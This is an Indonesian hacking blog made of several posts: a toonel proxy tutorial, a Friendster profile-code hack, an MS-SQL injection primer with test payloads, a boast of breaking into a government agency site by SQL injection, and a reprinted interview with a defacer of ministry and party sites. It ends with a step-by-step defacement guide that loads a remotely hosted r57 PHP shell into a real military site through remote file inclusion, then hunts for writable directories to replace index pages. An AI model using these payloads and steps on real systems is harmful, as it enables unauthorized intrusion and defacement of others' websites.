Semalem, tea' bilang kalo dia ga bisa buka blog gw. Gw agak kaget, masa sich'?!. Akhirnya gw coba dan ternyata bener banget, bukan hanya blog gw aja, blognya diapun coba gw buka ternyata ga bisa juga.

Tadi pagi gw suruh mas tomo buka blog gw, ternyata bisa.

Hm,,, coba sih pake toonel >:) hehehe.... ternyata bisa dibuka. Gw berkesimpulan bahwa semua IP dari speedy telkomnyet dilarang mengakses blogspot. Damn it..!

Tapi kenapa gw bisa masuk account blogspot yah? Buktinya gw nulis nih dari IP lokal.

+ parno aja lah. Tapi pepatah bilang, "banyak jalan menuju roma". Seperti kata the mentor, "...You can't stop us (hacker) ..."

Iseng² menjelajah di dunia internet, koq nemu ginian yah :p



Pajang nama sebentar ah. hehehe....

Kalo anda buka web tsb sekarang nama saya sudah tidak ada lg karena sudah saya hapus. hihihi.... kasian admin webnya ntar nangis :D, saya jg masih blom bisa bikin web :p

Tutor kali ini mengenai surfing nyaman & aman dengan menggunakan toonel.
What's toonel? silahkan cari sendiri di google yak :D . Sedikit gambaran bahwa toonel ini fungsinya seperti proxy, ini menurut saya loh. hehehe....
Oke, langsung aja ke materi (ky' dosen aja ;p)

Berikut langkah-langkah yang harus anda lakukan:
1. Download toonel disini
2. Install Java Runtime Environment (JRE) apabila belum terinstall di komputer anda. Wajib diinstall untuk menjalankan toonel. Kalau belum punya Java, bisa download disini
3. Set proxy di browser anda, dalam hal ini saya memakai Firefox. Klik tools-options-tab netwok-setting. Isi HTTP Proxy dengan localhost atau 127.0.0.1 dengan port 8080. Seperti gambar dibawah ini:


4. Lalu klik OK
5. Lalu jalankan toonel tadi. Maka akan tampak seperti ini:

6. Untuk melihat efeknya. Coba cek IP anda disini . Apakah itu IP anda sebenarnya? hehehe ....
7. Saya nyoba ngetes speed koneksi internet disini, hasilnya seperti gambar dibawah ini:

hasil speed diatas dapat berubah² karena toonel akan otomatis mengganti proxy. Yang jelas more faster for download or upload

Udah selesai, Sorry jika anda sebelumnya telah membaca artikel lain yang sama tapi artikel yang saya tulis ini bukan hasil copy paste, akan tetapi berdasarkan pengalaman saya sendiri.
Now, I've gotta go to have a breakfast. Bubye....

Setelah sekian lama code FS cantik saya dirusak oleh admin FS, akhirnya FS saya kembali berfungsi. Huh.. cpd. Kalau dulu caranya gampang hanya tingal generate code file .txt atau .js dengan menggunakan Firefox Linker tapi sekarang agak sedikit merepotkan caranya. Ok langsung aja saya kasih code FS . Berikut langkah-langkahnya:

Langkah 1:

Anda harus mempunyai account file hosting di http://www.ripway.com. Selain itu juga boleh, tapi saya tidak merekomendasikan :p. Ok, langsung ke langkah berikutnya...

Langkah 2:

Hapus css injection di file .js atau .txt kamu

Langkah 3:
Sekarang copy link file .js dan paste pada tulisan yang berwarna orange dibawah ini:

Code:

Langkah 4:
Buat file .swf di ripway dan paste code diatas, lalu di save.

Langkah 5:
Copy link file .swf anda tadi dan paste kedalam tulisan berwarna orange dibawah ini.

Code:

Langkah 6:
Sekarang copy code diatas dan paste kedalam file .css anda

Langkah 7:
Copy link file .css tadi dan paste kedalam tulisan berwarna orange dibawah ini.

Code:

Langkah 8:
Sekarang copy code diatas dan paste kedalam media box friendster, lalu save. Sekarang anda sudah mempunyai js linker untuk firefox. Cara diatas telah saya lakukan sendiri dan berhasil.

Catatan penting:

• Jangan ada css injection didalam file .js anda. Hal ini untuk menghindari doule loading code.
• Melakukan edit hanya pada file .js dan .css anda. Jangan pada file .swf atau code pada media box.

Yang perlu di ketahui sebelum sql injection pada ms-sql:

comments: --sp_password, sp_password berfungsi agar mssql tidak melakukan logs query pada mssql ( tapi kemungkinan tetap terlog pada server logs)
sering di temui pada web aplication: asp,cfm,aspx. etc.


step 1. mengetahui situs itu vulnerable sql injection atau tidak.

*menggunakan tanda petik,or 1=1,having 1=1,etc

bila mengunakan cara diatas tanda petik,or 1=1,having 1=1,dll maka umumnya kita akan mendapatkan pesan error. untuk pesan error dapat dilihat diatas.
http://www.target.com/blabla.asp?id=10'
http://www.target.com/blabla.asp?id=10 or 1=1--sp_password
http://www.target.com/blabla.asp?id=10 having 1=1--sp_password

Lebih lanjutnya anda download disini

Lagi... bugs pada website pemerintah kita. Kali ini terdapat pada website Lembaga Administrasi Negara (LAN). Oke, langsung ajake sasaran :D

Berikut screenshot halaman utama web tsb.


Lalu, lihat pada gambar berikutnya lagi:

Saya sudah login ke web tsb :D. Saya menggunakan teknik SQL Injection. Apa itu SQL Injection? Cari sendiri yak di google, panjang ntar kalo saya jelaskan disini. hehehe...

Lalu, saya penasaran dengan Server yang dipakai lembaga tsb. Dari hasil search lewat google, ternyata oh ternyata....


Servernya memakai OS Windos. Udah webnya ada bugsnya ditambah lagi, servernya pakai OS Windos pula. ck..ck..ck...

Masih seputar hacking, tapi kali ini saya tidak memberikan tutor hacking, so what else?... :D
Masih ingat pembicaraan di media massa tentang seorang hacker yang menyerang situs Depkominfo & Partai Golkar pada tanggal 26 maret yang lalu? Berikut cuplikan wawancara yang dilakukan oleh Staf ECHO kepada sang hacker tersebut:

Q: Selamat,anda menjadi pelaku aksi iseng yang pertama kali diwawancarai oleh saya :D

Q: Sebelum bertanya lebih jauh,apakah bersedia mengungkapkan identitas anda ? ,
  jika ya .. siapakah anda ?
A: Maaf berjuta-juta maaf, saya tidak bersedia.(nama Drs Suprawoto diambil dari header email
  yang digunakan oleh "siapakah.akyu@yahoo.com")

Q: Apa yang menjadi alasan anda untuk melakukan aksi iseng terhadap situs Depkominfo ?
A: Alasan? Saya kira dari pesan yang saya tinggalkan disana sudah cukup jelas alasannya apa. :D

Q: Biasanya jika seorang attacker melakukan penyerangan terhadap website,
  full deface terhadap 1 halaman ,nah mengapa anda hanya memposting gambar dan
  beberapa kalimat saja dalam situs depkominfo.go.id ?
A: HAHAHA.. biar awet dan adminnya ngga sadar.. :D

Q: Sepertinya gambar yang anda posting didalam situs depkominfo itu gambar Roy Suryo , apakah benar ?
A: Ah masa sih anda tidak tau.. :p 68% gambar RS tuh..

Q: Alasan anda menggunakan gambar Roy Suryo ?
A: saya kan fans beratnya RS

Q: Pendapat anda tentang komentar Roy Suryo di media massa ?
A: RS kayanya panas melihat berita seperti itu dan mungkin beliau salah ngomong,
  masa sih comment dia gitu banget, membawa dendam pribadi.
  hehehe. kalo kata cincha lawra sih "it's annoying.. " hahahaha

Q: OK, sekarang kita beralih ke situs golkar.or.id

Q: Alasan anda untuk melakukan aksi iseng lagi terhadap situs golkar ?
A: iseng aja, om RS ama om mentri kan dari kata2nya nantangin tu.. :p

Q: Apakah karena komentar Roy Suryo kah ?
A: yupez.. om RS n pak mentri yang punya project software antiporn.. :p

Q: Mengapa ada logat cinca lawra didalam pesan tersebut ?
A: saya cuma mencoba mengikuti perkembangan real life, sekali-kali kita
  masukin humor dikit lah, jangan terlalu serius :D jadi yang liat juga ga terlalu panas..

Q: Pendapat anda tentang UU ITE, apakah anda mendukung adanya UU tersebut?
A: Saya mendukung banget selama masih bisa masuk di logika, tapi yang saya liat,
  UUnya terlalu muluk-muluk, dan banyak yang tidak jelas dan tidak men-detail.:D
  Menurut saya sih, belum perlu lah para petinggi negara mengurus UU seperti ini.

Q: Anda mengatakan tadi belum perlu, mengapa?
A: Masih banyak hal yang lebih penting dari UU ini, seperti internet murah
  dan membesarkan bandwith internet di Indonesia. Coba liat deh negara
  tetangga (Malaysia), bagaimana pemerintahnya bisa nge-push ISP supaya ngasih
  Internet murah, supaya rakyatnya ngga gaptek.

  Lucunya pake bilang mau hemat bandwith, emang segede apa sih borosnya bandwith di Indonesia?
  Keadaan Internet Indonesia aja masih parah, eeh yang beginian diurusin,
  kayanya sih tu petinggi juga ngga ngerti apa internet deh.
  Layaknya orang yang membuat UU itu pada zaman batu yang belum ada Internet.
  kayanya ada udang dibalik batu nih :D

Q: Harapan/Saran anda terhadap pemerintah terkait UU ITE ?
A: Ya tolong ditinjau ulang saja kalo bisa ajak dan berunding dengan pakar-pakar,
  jangan ajak "pakar" IT:D

Q: OK,terima kasih telah bersedia menjadi narasumber kami .
A: sim-sim (warkop DKI style)

Sumber: echo|zine - issue#18

1. Buka web ini
2. klik Search
3. ketik RFI (Remote File Inclusion)
4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
5. Buka Google, dan liat Advisor yang kita pilih tersebut
6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut
7. Setelah dapat hasil dari Google, klik kanan Open NewTab[Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya
9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor
10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found.
11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain
12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error,
13. Ganti command exploit setelah tanda '='[sama dengan] dengan http://www.geocities.com/benny_arie_gamers/data.txt? [phpshell yang OL/Aktif]
contoh: http://www.arm.rtaf.mi.th//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/benny_arie_gamers/data.txt?
14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilakan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion
15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memilikik full akses atau -rwxrwxrwx / -rw-rw-rw <-- untuk file | drwxrwxrwx / drw-rw-rw <-- untuk direktory. Atau search dengan perintah: find / -perm 777 -type d
16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu
17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi

"It's just for education, I'm not responsible what you've done. Take your own risk"